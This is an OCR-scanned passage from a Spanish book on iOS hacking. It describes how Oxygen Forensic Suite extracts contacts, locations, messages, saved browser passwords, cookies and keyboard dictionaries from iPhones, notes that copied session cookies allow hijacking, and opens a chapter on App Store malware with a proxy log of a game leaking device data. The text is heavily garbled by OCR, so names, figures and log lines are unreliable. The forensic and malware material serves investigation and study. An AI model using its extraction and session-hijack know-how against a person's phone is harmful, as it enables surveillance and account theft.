mas  sencillo.  A  ctrntim] ación  se  muestran  las  más  importanies. 


Análisis  de  contactos 

Quizás  este  apartado  sea  uno  de  los  que,  desde  e!  punto  de  vista  de  una  ínvcsiigación,  pueda  tenerse 
en  cuenla  dada  su  utilidad  al  proporcional-  intbrniacióii  sobre  la  relación  que  exista  entre  los  contactos 
que  tenga  el  dueño  del  teléfono.  En  uii  tenninal  íOS,  como  ya  se  ha  mencionado  anteiionnoTitc,  estos 
datos  son  ñclieros  de  liptí  SQLitp.  que  pueden  ser  analizados  maiiualineiiLe  etm  cualquier  visor  de 
SQLUe. 

Dado  el  avance  tecnológico  ya  no  solo  se  guarda  un  nombre  y  un  teléfono;  sino  qne  muchas  veces 
se  añaden  notas  personales  del  contacto,  techas  significativas  coinn  cumpleaños,  páginas  web,  sus 
redes  sociales,  incluso  sus  fotos,  sin  olvidar  la  exLracción  de  infonnacióii  sí  el  usual io  tiene  uu 
coniacto  agregado  eii  la  inaicacion  rápida/favoriia.  Todos  estos  detalles  son  muy  interesantes  y  no  se 
debe  de  olvidar  que  gran  parte  de  Jas  investigaciones  comienzan  con  este  aparrado. 


imagen  06.06:  Infoiimaciári  ÉKtraíiia  de  uii  oofiOiutu  ccncr:;to. 

La  gran  potencia  de  Oxygcn  Fürmsic  es  que  es  capaz  de  reconocer  la  agenda  de  contactos  en  todas 
las  aplicaciones  c  indicar  todas  las  interacciones  que  ha  habido  con  ellos,  mostrando  por  cada 
contacto  si  ha  habido  una  llamada  realizada,  perdida,  si  se  ha  enviado  un  SMS.  un  }naLsapp,  una 
petición  de  videoconlereneia  por  Skype  o  todos  ios  coiTeos  electrónicos  iriLcrcaTTihíados. 

Esta  inl  orí  nación  se  puede  filtrar  además  por  cada  tipo  de  comunicación  y  ge  pueden  reconocer 
diferentes  cuentas  sociales  como  una  misma  persona,  lo  que  permite  obtener  una  mejor  vi sualizacléri 
de  los  datos. 
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Imagen  Infonnadüu  ÚQ  im  contado  eii  divei^as  aplicaciones  de  un  dispositivo. 

Además,  el  análisis  de  estos  datos  pemiite  saber  el  grado  de  cercanía  qne  nn  detcnniuado  usuario 
manLiciie  con  sus  contactos,  y  Fof^etisic  niucstra  este  gtado  mediante  un  gráfico  ciTcular  de 

relaciones,  donde  los  más  cercanos  al  núcleo  (el  dueño  dcl  temí in al)  son  los  que  más  relación  tienen 
con  él. 

Este  gi ático  se  llama  '^Estadísticas  de  Comunicaclótr^  y  pennite  saber  miicliñs  cosas  dcl  dueño  por 
las  comunicHcioTies  que  mantiene  con  toda  su  agenda  de  con  tac  Los. 


Imagen  fíñ.ííK:  Gráfico  “Estadísticas  de  Cünuiíiicacióu-'  que  permite  ver  la  relación  de  un  contocLO. 
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Geolocalización  de  datos  extraídos 

Ln  Smartphoñ^  es  ll7i  tli>íposjtivo  netamente  móvil  que  va  guarda-ndí)  información  de  los  lugares  por 
los  que  ha  pasado.  En  lina  investigacióii  judicial  es  probable  que  el  juez,  si  así  lo  considera,  acabe 
pidiendo  infomiacíóii  a  las  operadoras  para  conocer  a  qué  estaciones  de  teleftínía  se  conecró,  lo  que 
permitiría  hacer  un  estudio  de  la  posición  tísica  del  tertiiinal  mediante  trían gii la ción  de  señales. 

Esto  puede  no  ser  necesano  si  se  analiza  toda  la  mformación  GPS  que  almacena  un  teiminal  íOS. 
T.a  primera  de  ella  es  la  base  de  datos  de  las  Lottcs  de  comimicacioiies  que  se  almacena  en  la  bsse 
de  datos  cQmoUdaÍK^d.db^Jo  que  viene  a  ser  la  misma  íiiíbriiiaciun  a  la  que  se  tendría  acceso  con 
una  orden  judicial.  Hay  qúe  decir  que  esto  iio  es  del  todo  cierto,  ya  que  debido  a  un  gran  escándalo 
mediático,  Apple  lia  reducido  suslaiicíulmcnte  el  volumen  de  iníomiación  que  se  graba  en  este 
ñeñero. 


Otra  información  interesante  de  geoposicíoLiaiTiiento  son  las  aplicaciones  sociales  zomo  FourSquarii^ 
que  guardan  las  coordenadas  GPS  cuando  el  usuario  hizo  un  “check"in’’,  que  así  se  llama  el  proceso 
en  la  app. 


Iiu£gcn  06,09:  Fonm'ifc  ShHlí  l^iíuIízli  i^n  detalle  FourSquare. 

Se  puede  encoiitiar  también  información  GPS  en  los  metadatos  de  R)t[>gnifLas  tomadas  por  el 
terminal  o  publicadas  en  sitios  como  Twííter  o  FUckr.  Estos  datos  son  analizados  por  aplicaciones 
como  Grep,p)í0  por  supuesto  Oxygen  Fommic  Suite  analiza  estos  datos. 

Por  último,  en  el  caso  de  iOS^  también  se  tienen  en  cuenta  las  redes  Wí-Fí  a  las  que  nn  íerminal  se  ha 
conecLadí]  a  lo  largo  de  su  vida.  Estas  redes  pueden  estar  geo localizadas  en  las  bases  de  datos 
de  CfOagle^  por  lo  que  también,  se  toman  en  eücrta, : 

C  on  todos  estos  datos  extraídos  y  analizados,  Oxygen  P'orensic  Suiíe  crea  un  TímE-fAne  de  posiciones 
GPS  que  son  mosLniilos  en  un  mapa,  permitiendo  que  se  sepa  con  un  alto  grado  de  certidumbre  los 
sitios  por  los  que  ha  pasado  eí  terminal . 


IM 
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Mensajes  de  comunicación 

Annqiie  la  mensajería  instantánea  como  Skype,  y  WJiaísapp  están  triunfando  entre  los  iLsuaiios  de 
smartphones  no  se  debe  olvidar  que  eS  número  de  canales  de  comariicación  de  un  dispositivo  IOS 
es  infinitamente  mayor,  y  qne  puede  ir  desde  los  SMS/MMS  hasta  las  aplieaeiones  de  chat  como 
Messenger  pasando  por  supuesto  por  los  correos  electrónicos  > 

Un  análisis  de  im  lenTiinal  tOS  en  busca  de  las  comunicaeioues  implicaría  analizar  todas  las  bases 
de  datos  s  y  todos  los  ficheros  de  comuniL  adóii  de  todas  las  aplicaciones  con  es  Las  características 
encontradas  en  un  terminal,  tjhcvgen  Siuíe  hace  el  análisis  d.e  todas  esas  aplicaciones 

de  forma  autom ática,  y  muestra  por  cada  usuario  qué  mensaje  ha  sido  enviado  o  recibido  y  qué 
aplicaciones  ha  utilizado  para  ello,  Lal  y  como  se  puede  ver  en  la  si  guien  Le  captura. 


imagen  06. 1 1  :CtiracterÍBtiíia=i  de  cada  mensaje  enviado  y  rteibido. 
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Eli  el  caso  de  aplicaciones  de  mensajeria  concreia.  en  la  q^ue  puede  que  existan  contactos  que  no 
estén  en  la  agenda,  Oxygen  Forensic  hace  un  análisis  detallado  de  las  mismas,  teniendo  en  la  lista 
de  apps  completatnente  analizadas  un  número  ingente  de  ellas,  como  Whatsapp,  Facebookjbr  iOS, 
Twider,  Google  Talk,  Yahoo  Messenger,  Skype,  Gtnaii,  etcétera. 


Para  ver  (¡né  aplicaciones  con  estas  capacidades  están  instaladas  en  el  terminal  en  concreto.  Oxygen 
Fo}-ensic  Suite  tiene  un  panel  especial  para  ellos,  desde  los  que  se  puede  acceder  a  todos  y  cada  uno 
de  Ice  datos  de  la  aplicación.  En  la  siguiente  captura  se  puede  ver  el  caso  de  Whatsapp. 


[niagen  0^1.12:  Análisis  de  ^^hauapp. 

Hay  que  indicar  que,  aunque  Oxygen  Forensic  Suite  busca  datos  bomuJos  en  las  aplicaciones,  en 
el  caso  de  servdcioK  especializados  como  RecoverMeii^iages.cüm  es  posible  obtener  más  datos  de 
aplicaciones  como  Whatsapp,  ya  que  se  hace  una  interpretación  más  exhaustiva  de  ks  páginas 
boiTadas  de  los  ficheros  SQLiíe. 


Registro  de  eventos 

En  el  registro  de  eventos  se  puede  obtener  ci  ntíimo  historial  de  llamadas  realizadas,  respondidas, 
perdidas  o  enviadas^  esta  iiiformacjón  también  incluye  el  '^‘Tmesíatnp^'  mencionado  anteriormente. 
Ei  propósito  de  esla  iniormación  puede  ser  vital  para  deLcrminar  un  hltimo  uso  del  terminal  y  las 
llamadas  recientes  que  se  han  enviado/recíbído  en  el.  La  siguiente  captura  niuestm  esta  sección: 


Itiiflgen  Oó.  13:  Kegjslrü  de  eventos  de  llamadas. 


116 


llacking  de  dispositivos  IOS:  iPhone  &  iPad 


El  calendario 

F1  calendario  es  un  excelente  apanado  donde  es  posible  eonuccr  los  eventos  imponantes  qne  eí 
usuario  ha  marca<lo  en  su  Lcrrniiial,  tal  vez  reuniones  marcadas  er  determinados  sitios,  repeticiones 
de  tareas  con  una  alarma,  o  cualquier  iurormación  que  suele  ser  de  elevada  importancia  y  que  el 
usuario  del  teléfono  haya  detemiiiiado,  l'odos  estos  datos,  por  supuesto,  también  aparecen  mclnidos 
dentro  del  Tím^-fAne  frenerado  del  terminal. 

Web  browscr  &  cache  analyzer  {Navegador  web  /  analizador  caché) 

Hsüjíiiíir  el  historial  del  navegadory  sus  cookies  proporciona  una  información  extremadamente  útil. 
En  este  caso  particular  y  siendo  un  dispositivo  iüS  es  capaz  de  extraer  inromiacióo  del  navegador 
Safari.  Dependiendo  del  servicio  de  configuraulón  del  dispositivo,  Oxygen  Foremic  Stiite  es  capaz 
de  extraer  incluso  coiiuaseñas  que  se  han  marcado  en  el  navegador  para  recordar  divei*so&  servicios 
y  sitios  w^eb,  que  la  herramienta  irá  catalogando  en  la  sección  de pússvi’ord^  clcl  proyecto  de  análisis. 

Además  es  posible  consultar  el  historial  de  navegación,  las  páginas  marcadas  couno  favoritas, 
acceder  a  las  cookies  guardadas  en  el  navega  dor  para  poder  extraer  datos  incluso  de  sesiones  activa.s, 
e  infonnación  capturada  eu  immerosos  fomiulanos  que  hayan  sido  cacheados  por  el  navegador. 


Google  Services 

Los  servicios  de  Googir.  stju  interesantes,  sobre  todo  por  la  transparencia  y  el  heclio  de  que  nic luyen 
un  conjunto  de  sena  c  i  os  con  la  misma  crcdcrieiai,por  ello  Oxygen  Forensíc  Suite  es  capaz  de  extraer 
inríinriacióíi  detallada  de  Google  MaiL  Google  Calendan  Google  Taik,  Google  Maps  y  Google^. 
Permite  extraer  varios  usuarios  en  el  mismo  terminal  (ya  que  muchas  veces  los  usuarios  dividen 
estas  cuentas  según  uso  profesional  y  doméstico)  de  todas  y  cada  una  de  las  apps  do  Gaogle  que 
están  en  el  terminal. 
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Cabt:  dcstüL'ar  que  Foremic  Sidté  muestra  la  lista  de  Écheros  que  la  herramienta  ha  extraído 

sobre  la  míormación  de  Googie  Maiiy  como  puede  ser  Ginaiidb  entre  otros.  Esto  pennite  localizar 
fácilmente  los  ficheros  que  posterior! rtcnte  se  pueden  eonírastar  con  tttras  herramieutas  de  tipo 
data  carving  que  complementa  el  arsenal  como  analista  forense  (un  ejemplo  podría  ser  ei  caso  de 
RecoverMessages  para  Whatsapp). 

El  uso  de  mensajería  TM  y  en  este  caso  Googie  Talk  permite  extraer  eonversacioncs  y  contaetos 
que  el  usuario  haya  manLenido  en  su  dispositivo.  La  importancia  del  servicio  Googie  Maps  en 
una  investigación  es  alta,  ya  que,  para  completar  la  infomiación  de  geoposicioimjnieiiteo,  hay  que 
tener  en  cuenta  estos  datos.  Muchas  personas  utilizan  este  servicio  buscando  una  calle  o  un  sitio 
determinado.  Poder  extraer  esta  información  y  las  coordenadas  exactas,  pueden  mostrar  un  resulrado 
muy  importante  ante  im  análisis  forense. 


Imagen  Ofi.1  S:  r,í>cíi1¡7íic¡nn  de  un  punió  en  Maps. 


Yahoo!  Services 

: Aunque  no  tan  popular  como  Googie^  el  íuncioiiainieuto  de  captura  y  extracción  de  iníoimacíón 
jielaíiva  a  servicios  de  Yahoo!  es  prácticamente  idéntica,  feygefi  Foremk  8uííe  es  capaz  de  obtener 
formación  de  múltiples  usuarios,  tanto  de  Yahoo!  Messenger  como  de  Yahoo!  Mail  y  analizar  toda 
fia  información  que  de  estas  aplicaciones  hay  cu  el  sisleína. 

Aplicaciones  de  redes  sociales 

La  actividad  en  las  redes  sociales  cada  vez  es  más  impoilaiite  ante  un  análisis  forense,  en  este  caso  se 
►analizaran  algunas  de  las  más  importantes,  como  pueden  Facebooky  TwiUe}\  y  FourSqitam.  Hay 
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que  decir  que  Oxygen  Foisífisic  SuHt  afiade  un  inayoi  número  de  apiicaciones  de  este  tipo  deniro  de 
su  análisis  de  las  que  analiza  gran  cantidad  do  características  en  cada  una  de  ellas, 

Paia  cada  una  de  las  aplicaciones  sociales  que  reconoce  Oxygp.n  Foreiisic  Suite  (y  son  decenas  de 
ellas),  la  hcrraniionta  inoslrará  las  publicaciones,  los  amigos,  los  mensajes  publicados  en  privado  y 
se  podrá  obtener  de  cada  una  de  ellas  la  lista  do  usuarios  y /o  contraseñas  (si  las  hubiera)  coriñg  tirad  os 
en  cada  una  de  dichas  aplicaciones. 


Imagen  06,16:  Ualus  exliHÍJos  del  dispositivo  refenenfcR  a  Tviííer. 


Dropbox 

Ei  popular  servicio  de  sincronización  do  ficheros  en  la  nube  Dropbox  también  es  capaz  de  ser 
extraído  por  Oxygeri  Forensic  Suite,  la  posibilidad  de  ver  información  a  modo  do  previsualización 
de  los  ficheros  transferidos  d  osLe  popular  senúcio  puede  ser  de  gran  utilidad. 


Diccionarios 

En  los  Icrminalcs  iOSlos  datos  del  corrector  y  el  predictor  de  palabras  se  almacenan  en  el  disposiLivtj. 
Estos  datos  permiten  ver  las  palabras  teclcadus  que  alguna  vez  han  sido  tecleadas  en  ei  dispositivo, 
casi  a  modo  de  keyioy^ger,  y  con  üxygen  Fo7‘ensic  Smte  es  posible  extraer  este  diccionario. 

Esas  palabras  penniten  descubrir  lugares,  contraseñas  tecleadas,  o  mensajes  que  se  hayan  pt>dido 
enviar  por  medio  de  algún  sistema,  inclusíi  de  seguridad.  Para  poder  sacar  mejor  pixjvecho  de  este 
diccionario,  la  henaniienta  además  cuenta  con  un  simulador  de  frases  que,  uLtlizando  la  cronología 
intenta  dar  sentido  al  diccionario.  Hay  que  recordar  que  esas  posibles  frases  sor  solo  eso,  pasibles 
frases  que  no  tienen  porqué  haber  sido  csciiLas  en  ese  orden,  pero  que  tal  vez  puedan  a^mdar  a 
responder  a  alguna  cuestión  concreta.  Como  se  muestra  en  la  imagen  de  la  captura  se  incluye  un 
simulador  de  frases,  según  el  orden  cronológico  simula  una  posible  frase. 
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Aplicaciones 

Cadd  día  van  saliendo  nuevas  apJicaciones,  y  el  equipo  de  Oxygen  Forensic  Suite  va  analizando  todas 
y  cada  una  de  ias  más  populares.  No  obstante,  puede  que  alguna  aplicación  no  haya  sido  analizada, 
o  que  se  tenga  interés  en  analizar  en  detalle  algunas  de  ellas  para  sacar  más  inlormaeión.  Para  ello, 
en  el  panel  de  aplicaciones  va  a  ser  posible  acceder  a  todos  los  ficheros  que  están  dentro  del  bimále 
de  la  aplicación  en  el  sistema,  y  se  clasiñcarán  en  fomiatos.  Así,  será  posible  ver  el  archivo  SQUíe^ 
PUsí  o  Xlvfl.  que  utiliza  uriíi  determinada  App  para  inlentar  sacar  más  información  manualmente, 


Para  revisar  estos  ficheros  se  acompañan  visores  para  SQLlte^  para  ficheros  FUst  y  Bplist,  editores 
de  texto  para  ver  ficheros  TXT  o  de  datos,  e  incluso  editores  liexadecimaks  que  liacen  el  análisis 
más  cómodo. 
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Si  una  aplicación  en  concreto  fuera  de  inLercs  cu  el  atiálisi&i,  bastaría  con  situarse  en  la  zona 
correspondiente  y  seleccionar  los  archivos  que  se  quieran  escnitar. 


Aplicaciones  de  nialware  y  spyware 

Como  es  posible  ver  en  el  capitulo  dedicado  a!  mahvaiv.  dentro  de  este  libro j  existen  niuclias 
alteríiativas  para  üoyanizai  un  tennínal  iPhom,  y  muchas  de  ellas  son  en  equipos  con  JailbreaL 

OxygpJ2  FoiT.mic  Suite  analiza  las  app^  que  se  encuentran  en  un  terminal,  ya  sea  conJaílbmak  como 
únJaübxsak.  Especial  es  el  caso  de  iina  i  n  ve  aligación  forense,  y  un  terminal  con  Jaiíbreak,  En  dicho 
caso  hay  que  dedicar  especial  atención  a  este  tipo  de  software  malidoso  que  puede  estar  instalado 
en  el  dispositivo. 


Tiíiii^eiL  06. 1 9:  AlgLiEiíis  appis  ée.  reconocí  das  pfir  Foj^írsic  Suite. 


En  ia  última  versión  hay  una  gran  cantidad  de  ellas  en  la  sección  spyware,  pero  siempre  hay  que 
revisar  bien  todas  las  apps,  no  sea  que  en  alguna  de  ellas  estuviera  alguna  de  las  nuevas  herramientas 
que  se  crean  día  a  día  para  instalar  malwarc  en  el  dispositivo,  n  algún  mahvúin?  dirigí  do  cii  el  mismo. 


Explorador  de  archivos  _ 

Si  se  sigue  bajando  el  nivel  de  acceso,  se  puede  Lralar  lodo  el  terminal  como  un  único  sistema  de 
rieheras,  sin  pensar  qué  archivos  peUenecen  a  qué  úpps  o  a  qué  parte  del  sistema.  Esto  os  útil  cuando 
se  buscar  detonninados  docunicnios  o  detenniiiado  tipo  de  archivo  del  que  se  quiera  oxtraer  un  dato 
especial. 

Forensic  Suite  proporciona  una  interfaz  cómoda  para  ello,  dostacandu  para  los  usuarios 
más  avanzados,  k  cxisLoncia  de  las  pestañas  que  listan  automáticamente  archivos  de  tipo  imágenes, 
audio,  videos,  archivos  de  bases  de  dalos,  y  demás  carpetas.  Esto  es  extremadamente  útil  cuando  no 
se  conoce  la  estructura  de  ficheros  de!  sistema  operativo  y  se  busca  algo  en  eoncreto.  La  siguiente 
captura  muestra  un  ojomplo  de  navegación  intuitiva  de  ficheros. 
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Imagen  ÍJ6,20:  Listado  de  ficheros  de  um  dispositivo. 

Desde  esta  inteiikz  es  muy  cóoiodo  buscar  dalos  concroüm.  Por  ejemplo,  uno  de  los  tipos  de  ficheros 
que  no  aparecen  son  los  hmajycaoides.  Sería  posible  elegir  im  punto  de  la  estructura  de  carpetas  y 
realizar  una  búsqueda  para  descubrii  que  apps  tienen  sesiones  abiertas,  y  por  lo  lanío  saber  cuáles 
podrían  ser  secuestradas  desde  otro  dispositivo  siiiipleoiente  etípiaudíi  estos  ficheros. 


Logs  de  actividad  del  dispositivo  íOS 

Como  Último  paso  en  el  descenso  de  nivel  es  posible  obtener  aún  más  datos  si  cabe,  con  la 
infbnnacíón  de  lo  que  el  usuario  ha  hecho  en  el  Lcléfono  revisando  los  iogs  del  dispositivo.  En  este 
apartado  es  posible  incluso  determinar  qué  tecla  ha  sido  pulsada  y  en  qué  momento  fue  hecho. 

Por  supuesto,  no  es  fácil  el  interpretar  todos  estos  datos,  y  puede  que  el  voluoien  de  in formación  que 
aparezca  a  lo  largo  de  un  gran  periodo  de  tiempo  o  se  haya  perdido,  o  sea  de  una  magnitud  ingente, 
pero  es  posible  tener  estos  datos,  tal  y  como  se  muestra  a  continuación  en  la  siguiente  captura  de 
pantalla. 
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Imagen  Ü6.2 1 ;  Vista  dei  ilch^rü  ¡o^  del  dispositivo. 


Generacinii  de  informes 

Por  supLiesto,  como  herramienta  profesional  que  es,  Oyygen  Forensic  Suite  permite  generar  mLilLitiici 
de  informes  a  alto  nivela  y  por  ello,  en  todas  las  partes  de  la  herramienta  se  pueden  ir  mamando  datos 
como  evidencias  para  que  aparezcan  en  los  diferciiles  tipos  de  iiironiies  que  puedes  ser  exportados 
o  impresos. 

El  botón  de  exportación  pemiíte  imprimir  este  mfbnne  en  un  cómodo  fíchero  PDF,  XML,  líl'ML, 
RTF,  XI.S  o  eSV,  y  bastará  con  rcaíizarlt»  desde  la  sección  que  interese  imprimir  en  cada  uno  de  los 
casos. 


3.  Conclusión  y  soporte 

Oxygen  t  'orensic  Suite  es  una  de  las  mejores  herramientas  comerciales  eon  mayor  proyección  en  d 
mercado  de  las  soluciones  de  Análisis  Forense  Móvil  basadas  en  extracción  vía  un  análisis  lógico. 

Sumando  una  interfaz  aniigabie,  informes  completos,  y  un  ahorro  de  tiempo  junto  a  la  imposibilidad 
de  cometer  un  fallo  a  la  horade  ejecutar  una  in  ves  Ligación  hace  que  esta  herraoiienia  sea  indispensable 
para  cualquier  analista  u  organización  que  necesita  realizar  muitipies  extracciones  o  investigaciones. 


Capítulo  VL  Ánctlisis  forense  de  datos  de  un  terminal  IOS  con  Oxygen  Foremic 


123 


RccicnLcmcnLc  la  aplicación  ha  sido  traducida  al  castellano,  la  única  herramienta  que  tiene  soporte/ 
interfaz  en  la  lengua  de  Censantes,  El  soporte  y  venta  de!  producto  se  puede  realizar  a  través  del 
canal  de  España  y  Latino  América  vis  i  Lando  la  web  del  parLner  oficial  Mn\n^í!.enigma^ec.Cúm_ 

Las  constan  Les  innovaciones,  actúa  lizac  iones  que  incorpora  el  equipo  humano  de  Oxygen  Pbrensic 
Suite  le  hace  ser  ima  de  las  mejores  opciones  para  realizar  análisis  foi^nse  de  niaiiera  fácil  y  rápida 
en  este  apasionante  mundo. 

Para  la  versión  en  Castellano  y  obtener  soporte  o  información  se  debe  contactar  con  el  paitner  de 
Oxygen  Forensic  Suite  tnigmaSec.com.  Ellos  son  los  responsables  de  la  traducción  y  para  las  ventas 
en  el  ten  itoiio  español  y  en  deterniinadas  zonas  de  América  Latina. 

A  su  vez  también  es  piisiblc  visitar  la  página  oficial  del  producto  en  http://wyvw.  Oxygen-foremic.com 
donde  se  podrá  obtener  La  demo  del  producto  durante  30  días  y  sin  apenas  limitaciones^  a  excepción 
del  número  de  ejecuciones  y  la  prohibición  de  utilizar  la  herrainicuta  para  Hnes  comerciales. 

Cabe  destacar  la  existencia  de  dircrentes  tipos  de  licencia,  incluyendo  una  versión  apoyada  en  un 
iicenciamieuto  por  USD  pndiendo  así  tener  la  herramienta  instalada  en  divei'sas  maquillas  incluyendo 
el  soporte  en  yMlVare. 
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1.  Introducción 

I 

1  El  m  ndel  o  de  negocio  ái  Apple  se  sustenta  no  solo  en  las  ftiticional  i  dades  y  opciones  de  sus  productos, 

ya  se  an  hardware  o  software,  sino  en  utia  imagen  de  prestigio,  repuiacióti,  calidad,  etcétera,  que 
jlos  usuarios  perciben  respecto  a  los  dispositivos  iOS.  Si  además,  se  suma  esto  a  que  la  App  Store 
\  actúa  como  una  especie  de  "'aiitivínjs"\  el  resultado  es  que  muchos  usuarios  viven  creyendo,  que  el 
sistema  operativo  de  su  temiinal,  o  de  su  tablet,  es  infalible  y  que  no  corre  riesgos  de  ser  infectado 
por  maíware, 

En  iOS.  al  igual  que  en  oíros  sistemas  operativos,  existen  vectores  de  amenazas,  como  viius,  gusanos, 
ataques  de  phishing^  tróvanos,  cxplúits^  y  en  general,  malware.  Lo  que  ocurre  en  este  caso,  es  que  la 
imagen  que  los  de  Cupertíno  oírecen  sobre  su  sistema  operativo  móvil,  hace  pensar  que  no  existe  el 
malware  cu  1(95,  pero  la  realidad  es  muy  distinta. 

A  continuación  se  comentará  un  poco  más  en  el  detalle  de,  corno  Apple  eriba  las  aplicaciones  que 
se  suben  a  bíÁpp  Store,  y  es  que,  aunque  ya  se  sabe  que  no  existe  seguridad  al  100%  o  completa, 
esta  constituye  un  obstáculo  más,  para  diflcultar  el  camino  de  los  atacantes//j¿íc¿erjs^  al  llevar  a  cabo 
acciones  maliciosas. 

En  esta  línea  de  poner  obstáculos  a  l{)s  aricantes  para  dificultar  ia  explotacióm  Apple  ha  ido 
incorporando  diferentes  medidas  de  seguridad  para  mitigar  las  posibles  ainenasas.  Se  está  hablando 
de  medidas  como  reducción  de  la  capa  de  ataque  o  Reéuced  Atíack  (medida  ya  conocida 

en  aplicativos  web),  reducir  o  simplificar  el  sistema  operativo,  esto  es  también  conocido  como 
L^ripped Down  7(95%^  (como  por  ejemplo  reducir  las  opciones  de  la  shell,  o  eliminar  muchos  de  sus 
ejecutables),  separación  de  privilegios  (típico  en  sistemas  L7V7A'),  y  oirás  técnicas  ya  conocidas  en 
flavegadores  web,  como ^57/?  o  Sandboxing. 

Pero  la  medida  que  se  va  a  tratar  ahora  es  la  que  se  conoce  como  ''''Code-Signlng^\  y  que  no  es  más 
que  un  ñltro  o  revisión  que  realiza  de  las  apps  de  terceros  que  se  intentan  subir  a  W  App  Store, 
L'na  vez  que  las  apps  han  pasado  dicha  revisión,  es  deeir,  que  han  sido  aceptadas  por  Áppíe^  una 
entidad  ceruficadora  de  conñanza  o  CA,  que  en  este  caso  es  la  propia  Apple,  tinna  (con  su  clave 
privada)  binarios  y  librerías,  antes  de  que  el  kemel  permita  su  ejecución.  Además,  solo  las  páginas 
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de  mernoria  que  provengan  de  fuentes  firmada.s  podrán  ser  ejeouladas.  Todo  esio  conlleva  a  varias 
coiiciusiones: 

-  No  se  puede  descargar,  instalar  o  ejecatar  software  malicioso. 

Las  apps  no  pueden  cambiar  su  comportamiento  dmámícamenLe  o  auLoactual izarse  por 
si  mimas, 

-  Solo  se  pueden  descargar  apps  de  la  /ipp  Store,  y  este  es  uno  de  los  principales  motivos 
por  los  que  los  usuarios  roali/íin  el  Jailbreak  a  sus  dispositivos,  ya  que  de  esta  manera, 
pueden  saltarse  el  Code-Sígmng,  e  instalar  y  ejecutar  aplicaciones  no  firmadas. 

“  Apple  actúa  de  autiviius,  y  es  muy  difícil  infectarse  de  maiware^  y  por  tanto  existen  pocas 
muestras  de  malware  conocidas. 

-  Otro  impacto  del  Code-Sigmng  es  que  complica  la  explotación.  Un  expioií  que  ejecute 
código  en  memoria,  podría  intentar  descargare  ejecutar  código  u  otras  aplicaciones  maliciosas, 
pero  esto  será  denegado,  ya  que  no  están  ñnriados.  Por  este  motivo,  los  expioíts  estarán 
limitados  a  ios  procesos  explotados  originalmente  (a  menos  que  ataquen  otras  caracLcristicas 
del  dispositivo). 

La  App  Slo¿'e  cuenta,  según  los  datos  de  la  última  WWDC  2012  keynote  de  Apple,  con  más  de 
650.000  apps  y  se  han  realizado  más  30.000  millones  de  descargas.  Pero  a  pesar  de  las  elevadísimas 
cifras  que  maneja  Ápple^  en  cuanto  al  número  de  apps,  descargas  servidas,  número  de  cuentas  de 
clientes  (400  milkmes),  y  en  contra  de  lo  que  se  pueda  pensar,  el  número  de  muestras  de  maiw^are 
conocidas  en  iOS  es  muy  reducido.  Y  esto  es  en  gran  parte  debido  a  que  la  propia  App  Store  actúa  a 
modo  de  antivirus. 

El  malware  existe  en  tOS.  y  casos  de  fuga  de  datos  están  o  lian  estado  a  la  orden  del  día.  Ya  quedó 
demostrado  cuu  la  prueba  de  Charlie  Miller.  que  aunque  la  App  Store  actúa  a  modo  de  antivirus,  y 
existen  pocas  muestras  de  malware  conocidas,  el  filtro  de  los  ingenieros  de  Apple  no  es  infalible, 
y  por  tanto  hay  que  estar  alerta  en  cuanto  a  cómo  las  apps  utilizan  los  datos  confidenciales  de  los 
usuarios^  y  como  a  veces  pueden  vnilnerar  la  privacidad  del  propietario  del  dispositivo. 


2.  Troyanos  en  la  AppStore 

Conseguir  introducir  nn  Lroyant)  en  un  lermiiial  a  través  de  XnÁpp  Store  es  harto  complicado,  debido 
a  las  revisiones  de  funcionalidades  y  controles  que  se  realizan,  sin  embargo,  no  es  imposible,  A  lu 
largo  del  tiempo  se  hait  visto  casos  eu  los  que  se  introduce  un  malwmv  en  la  App  Store  que  acaba  en 
un  terminal,  o  apps  aparentemente  normales  que  tenían  funciones  que  atentaban  contra  la  privacidad 
de  los  usuarios,  A  continuación  se  van  a  presentar  varios  casos  reales  de  malware  o  fugas  de  datos, 
a  través  de  aplicaciones  que  lian  estado  en  la  App  State. 
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Find  And  CaU 

Un  caso  ampliamente  conocido,  es  ei  de  la  aplicación  Caí!  que  robaba  agendas  de  contactos 

sin  conocimiento  o  conseoití miento  alguno  por  paite  del  usuario,  tal  y  como  se  aprecia  en  el  código 
fuente  de  la  app: 
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Imagen  07  ^1;  Campos  mbad os  de  ía  ageada  de  contactos,  por  Ui  npp  FmdArvií  CaU.  ' 


StormS  y  sus  juegos 

Otro  caso,  conocido  como  el  primer  gran  escándalo  de  robo  de  datos,  ñierou  los  juegos  de  la 
compañía  ^íormH^  como  Vampiras  JÁve,  Zombieis  Jdve,  Rockstar  Llve,  Kmgdoms  Uve,  iiacing  L/vc, 
iMobsters,  World  Wm\  etcétera,  que  robaban  tanto  las  agendas  de  contactos  de  los  usuarios,  así  como 
otros  datos  conñdenciales  como  UDED,  correo  electrónico,  nombre  del  registro  en  el  juego,  número 
de  tele  fono,  etcétera.  A  continuación  se  muestra  una  captura  del  ¡og  del  juego  Vampires  Líve\ 
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■12511 B471 1 .309  S44 10,C.1 0.22  TCP_Ml5S/200  HZ5  GET  http- y  /vL.stjoniíi8*com 
/points.  ph  p?ver5ion=1 .  SZfeüdíd  =ae4e5eb4d  f5bÜdMf947ffiad4%aec361 5  5204 1  dt 
pf-62ÜÉ49A2A5  A6241 858  09768783  EC3  EAREf pb- 1 G  apnum=041 4^206 1 09&20  SOOamíJdÉl  -1  PhOfiefe 
sn-iPhone%200S&sv-3.0  DiRECT;67.22a.Tl7.55  tfflít/html 

1251184712,091783  10.0. 10,22  TCP^MISS /lOO  1A6C  GET  httpr/ystatlc.storma.connM/jS 
/giabal.jsív-H?  DIRECT/ 198.142,23. 1G2  appl1catTí)nyí:'javfiSCript 

125t1B47tZ.B39  1373  10,0.10.22  TCP_yi‘JSS/10040l3  GET  http:  y /3tatk.storfiná,cflm/YL.'c£S 
/giobal.C5S?v-147  3]RECr/1 98. 142,23. 132  Cext/OSS 

1251184713,207  219  10.Q.1C.22  TCPJrtlS5/2Cfó  640  GET  bLtp://íUtic.sbornn&.com/vl/írnages 
/btnMedSg.png  D(REa/1 98,142.23. 102  imsge/ptíg 

1251 1  £47 1 4 . 023  11 84  1 0 .0. 1 0, 22  TC?„MESS  /  200  1 3737  G  ET  http :  /  / statíc ,  sborin8,com  / vl/images 
/.CigO,png?V“147  -  DÍRECT/19SJ  42.211 02  ínnafi&/png 

Insíde  the  actual  data  stfeanns*  see  sorrvethlñfiílfifttlar  ta  thts: 

G  ET  bttp :  i  M  .stomift  .cofn.'points.  phpíveralísn^l .  52ñ 

